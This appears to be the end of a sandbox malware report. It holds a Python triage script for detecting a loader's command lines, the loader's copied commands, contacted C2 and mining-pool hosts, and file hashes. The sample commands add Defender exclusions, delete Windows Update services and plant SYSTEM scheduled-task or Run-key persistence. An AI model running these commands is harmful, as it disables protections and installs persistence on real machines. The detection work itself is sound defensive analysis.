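    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE text)."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed encoded command


def analyse(cmdline: str) -> Dict[str, List[str]]:
    """Return {category: [values]} findings for one process command line."""
    found: Dict[str, List[str]] = {}

    def add(cat: str, value: str) -> None:
        found.setdefault(cat, []).append(value)

    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        add("encoded_powershell", decoded)
    for svc in _SC_STOP_RE.findall(cmdline):
        if svc.lower() in _UPDATE_LOWER:
            add("update_service_stopped", svc)
    for svc in _REG_DEL_SVC_RE.findall(cmdline):
        if svc.lower() in _UPDATE_LOWER:
            add("update_service_deleted", svc)
    m = _EXCLUSION_RE.search(cmdline)
    if m:
        add("defender_exclusion", m.group(1))
    if _TASK_CREATE_RE.search(cmdline):          # only creation, not schtasks /run
        for name in _TASK_NAME_RE.findall(cmdline):
            add("scheduled_task_persistence", name)
    for name in _RUN_KEY_RE.findall(cmdline):
        add("run_key_persistence", name)
    for setting in _POWERCFG_RE.findall(cmdline):
        add("sleep_timeout_disabled", setting)
    m = _SELF_DELETE_RE.search(cmdline)
    if m:
        add("delayed_self_delete", m.group(1))
    return found


def triage(cmdlines: List[str]) -> Dict[str, List[str]]:
    """Merge per-line findings; values are de-duplicated and sorted."""
    merged: Dict[str, set] = {}
    for line in cmdlines:
        for cat, values in analyse(line).items():
            merged.setdefault(cat, set()).update(values)
    return {cat: sorted(vals) for cat, vals in sorted(merged.items())}


# Sample input: command lines copied from the process list in this report.
SAMPLE_CMDLINES = [
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==''',
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force",
    r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nugixlm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsHost' /tr '''C:\Program Files\Windows\WindowsHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Windows\WindowsHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHost" /t REG_SZ /f /d 'C:\Program Files\Windows\WindowsHost' }""",
    r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0",
    r'''C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f''',
    r'''C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe"''',
]

if __name__ == "__main__":
    for cat, values in triage(SAMPLE_CMDLINES).items():
        print(f"{cat}: {', '.join(values)}")
```

Run stand-alone it prints one line per category; in a real hunt, feed it the CommandLine field of your process-creation telemetry instead of SAMPLE_CMDLINES and treat any host with update_service_deleted plus scheduled_task_persistence or run_key_persistence as matching this loader's pattern. The regexes are deliberately tied to the exact syntax seen here (sc stop, reg delete under Services, choice /T as a sleep), so they are a starting point for this family rather than a general-purpose LOLBin detector.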

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 panel382523.site udp
N/A 31.31.198.106:80 panel382523.site tcp
N/A 52.168.112.66:443 tcp
N/A 93.184.221.240:80 tcp
N/A 65.21.237.20:43077 tcp
N/A 8.8.8.8:53 pool.hashvault.pro udp
N/A 45.76.89.70:80 pool.hashvault.pro tcp
N/A 8.8.8.8:53 panel285626.site udp
N/A 31.31.198.99:80 panel285626.site tcp
N/A 31.31.198.99:80 panel285626.site tcp

Files

memory/2204-120-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-121-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-122-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-123-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-124-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-125-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-126-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-127-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-128-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-129-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-130-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-131-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-132-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-133-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-134-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-135-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-136-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-137-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-138-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-139-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-140-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-141-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-142-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-143-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-144-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-145-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-146-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-147-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-148-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-149-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-150-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-151-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-152-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-153-0x00000000005C0000-0x00000000005C8000-memory.dmp

memory/2204-155-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-154-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-156-0x00000000052D0000-0x00000000057CE000-memory.dmp

memory/2204-157-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-158-0x0000000004E70000-0x0000000004F02000-memory.dmp

memory/2204-159-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-160-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-161-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-162-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-163-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-164-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-165-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-166-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-167-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-168-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-169-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-170-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-171-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-172-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-173-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-174-0x0000000004E10000-0x0000000004E1A000-memory.dmp

memory/2204-175-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-176-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-177-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-178-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-179-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-180-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-181-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-182-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-183-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-184-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-185-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-186-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-187-0x0000000077540000-0x00000000776CE000-memory.dmp

memory/2204-201-0x000000000F3B0000-0x000000000FD58000-memory.dmp

memory/2204-202-0x000000000BB50000-0x000000000BBE2000-memory.dmp

memory/2204-203-0x000000000BBE0000-0x000000000BC02000-memory.dmp

memory/2204-205-0x00000000178B0000-0x0000000017C00000-memory.dmp

memory/2268-216-0x0000000000000000-mapping.dmp

memory/4292-222-0x0000000000000000-mapping.dmp

memory/4736-239-0x0000000000000000-mapping.dmp

memory/4736-275-0x0000000004700000-0x0000000004736000-memory.dmp

memory/4736-280-0x0000000006F50000-0x0000000007578000-memory.dmp

memory/4736-299-0x00000000075C0000-0x0000000007626000-memory.dmp

memory/4736-300-0x0000000007730000-0x0000000007796000-memory.dmp

memory/4736-303-0x0000000006F20000-0x0000000006F3C000-memory.dmp

memory/4736-304-0x00000000077A0000-0x00000000077EB000-memory.dmp

memory/4736-308-0x0000000007EF0000-0x0000000007F66000-memory.dmp

memory/4736-319-0x0000000009590000-0x0000000009C08000-memory.dmp

memory/4736-320-0x0000000008CF0000-0x0000000008D0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe

MD5 bf41699ea8e7a4ddc8989a616909c05d
SHA1 1f39ca29bec36d9971fd67a04e48108afa487b39
SHA256 ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1
SHA512 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634

memory/4952-325-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe

MD5 bf41699ea8e7a4ddc8989a616909c05d
SHA1 1f39ca29bec36d9971fd67a04e48108afa487b39
SHA256 ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1
SHA512 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634

memory/4824-329-0x0000000000000000-mapping.dmp

memory/4636-335-0x0000000000000000-mapping.dmp

memory/4952-354-0x00007FF6E53A0000-0x00007FF6E6421000-memory.dmp

memory/4712-356-0x0000000000416C9E-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd0b4ae7e3ed2099bb25465b45fcbf49
SHA1 63f95e7b6e7563045452357df06339c41d91a6d6
SHA256 58b774bb420382d9bb3016fb7f039886a8568c93c2c09c08b3b26393f580cb9a
SHA512 d380bee666a044b895a53a8e2d6e620048fbb3258473d2ce4c6f3df46abed7cf919a1714e4f8b0a35c7e62747cbd6da6f744e4b5cb35136fd67d804e298c1fe4

memory/664-389-0x0000026D31B10000-0x0000026D31B32000-memory.dmp

memory/664-399-0x0000026D32670000-0x0000026D326E6000-memory.dmp

memory/4712-398-0x0000000000400000-0x0000000000436000-memory.dmp

memory/4712-406-0x00000000054D0000-0x0000000005AD6000-memory.dmp

memory/4712-408-0x0000000004F50000-0x0000000004F62000-memory.dmp

memory/4712-423-0x0000000005080000-0x000000000518A000-memory.dmp

memory/4712-431-0x0000000004FB0000-0x0000000004FEE000-memory.dmp

memory/4712-443-0x0000000004FF0000-0x000000000503B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

memory/5076-460-0x0000000000000000-mapping.dmp

memory/3492-463-0x0000000000000000-mapping.dmp

memory/940-464-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ed40265bc41f67f9b43ab9af4c778fc4
SHA1 82dc7e119ee84c74e7993bb18a516f669394b03b
SHA256 5c9eff5fa774ccf71f6c628402290a097e29c1aca175d577f2d38d2100fa0a3b
SHA512 74e2b7cd6340ed11a4ac2155b990664054ae1b182461cef9121299db97b2700949faf3978693abcac3e7e2b79d441a325ce0de79420ae53e86400261b6264990

memory/3816-467-0x0000000000000000-mapping.dmp

memory/3360-468-0x0000000000000000-mapping.dmp

memory/4128-473-0x0000000000000000-mapping.dmp

memory/3488-476-0x0000000000000000-mapping.dmp

memory/4572-475-0x0000000000000000-mapping.dmp

memory/1168-479-0x0000000000000000-mapping.dmp

memory/744-482-0x0000000000000000-mapping.dmp

memory/4712-486-0x0000000005F20000-0x0000000005F70000-memory.dmp

memory/416-487-0x0000000000000000-mapping.dmp

memory/2912-490-0x0000000000000000-mapping.dmp

memory/4520-491-0x0000000000000000-mapping.dmp

memory/2300-492-0x0000000000000000-mapping.dmp

memory/4712-508-0x0000000006920000-0x0000000006AE2000-memory.dmp

memory/4712-509-0x0000000007020000-0x000000000754C000-memory.dmp

memory/4952-517-0x00007FF6E53A0000-0x00007FF6E6421000-memory.dmp

memory/3556-518-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e51717fdd25d6eed0d48cd8ff4b2961
SHA1 fd16ded3eda88a86b6e9654fff829cef01cb00af
SHA256 a6bec2c9e3362d7cb9ca8bb3cf6922ce6a75bfbc11dc352d949476e6522e741a
SHA512 7ffc27dfebde4dcff968964b59f474711a9a98ecd6474f621e0ca6da4d2d6342fd7c4dcd5caed68823a2eaf5db0821c41d9dab07273d184885bc58f510060fa7

memory/4712-524-0x0000000006290000-0x00000000062AE000-memory.dmp

memory/4032-531-0x0000000000000000-mapping.dmp

C:\Program Files\Windows\WindowsHost

MD5 bf41699ea8e7a4ddc8989a616909c05d
SHA1 1f39ca29bec36d9971fd67a04e48108afa487b39
SHA256 ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1
SHA512 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634

C:\Program Files\Windows\WindowsHost

MD5 bf41699ea8e7a4ddc8989a616909c05d
SHA1 1f39ca29bec36d9971fd67a04e48108afa487b39
SHA256 ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1
SHA512 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634

memory/5096-535-0x00007FF7CECC0000-0x00007FF7CFD41000-memory.dmp

memory/4912-557-0x000001E9F89B0000-0x000001E9F89CC000-memory.dmp

memory/4912-563-0x000001E9F8EE0000-0x000001E9F8F99000-memory.dmp

memory/4912-596-0x000001E9F89D0000-0x000001E9F89DA000-memory.dmp

memory/5056-684-0x0000000000000000-mapping.dmp

memory/3572-685-0x0000000000000000-mapping.dmp

memory/3492-686-0x0000000000000000-mapping.dmp

memory/2928-687-0x0000000000000000-mapping.dmp

memory/940-688-0x0000000000000000-mapping.dmp

memory/2116-689-0x0000000000000000-mapping.dmp

memory/3332-690-0x0000000000000000-mapping.dmp

memory/3360-691-0x0000000000000000-mapping.dmp

memory/4632-692-0x0000000000000000-mapping.dmp

memory/4192-693-0x0000000000000000-mapping.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 573d77d4e77a445f5db769812a0be865
SHA1 7473d15ef2d3c6894edefd472f411c8e3209a99c
SHA256 5ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c
SHA512 af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc

memory/2220-694-0x0000000000000000-mapping.dmp

memory/4228-699-0x0000000000000000-mapping.dmp

memory/5104-701-0x0000000000000000-mapping.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 631f4b3792b263fdda6b265e93be4747
SHA1 1d6916097d419198bfdf78530d59d0d9f3e12d45
SHA256 4e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976
SHA512 e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe

memory/3188-706-0x0000000000000000-mapping.dmp

memory/4292-931-0x0000017F55890000-0x0000017F558AC000-memory.dmp

memory/5096-940-0x00007FF7CECC0000-0x00007FF7CFD41000-memory.dmp

memory/960-967-0x00007FF6AE7D14E0-mapping.dmp

memory/524-970-0x0000000000000000-mapping.dmp

C:\Program Files\Google\Libs\g.log

MD5 fdba80d4081c28c65e32fff246dc46cb
SHA1 74f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256 b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512 b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

memory/412-972-0x00007FF6F9402720-mapping.dmp

memory/5096-974-0x00007FF7CECC0000-0x00007FF7CFD41000-memory.dmp

memory/412-977-0x00007FF6F8C10000-0x00007FF6F9404000-memory.dmp

memory/412-978-0x0000028BAF310000-0x0000028BAF330000-memory.dmp

memory/412-979-0x00007FF6F8C10000-0x00007FF6F9404000-memory.dmp

memory/412-980-0x0000028BAF360000-0x0000028BAF380000-memory.dmp

memory/412-981-0x0000028BAF360000-0x0000028BAF380000-memory.dmp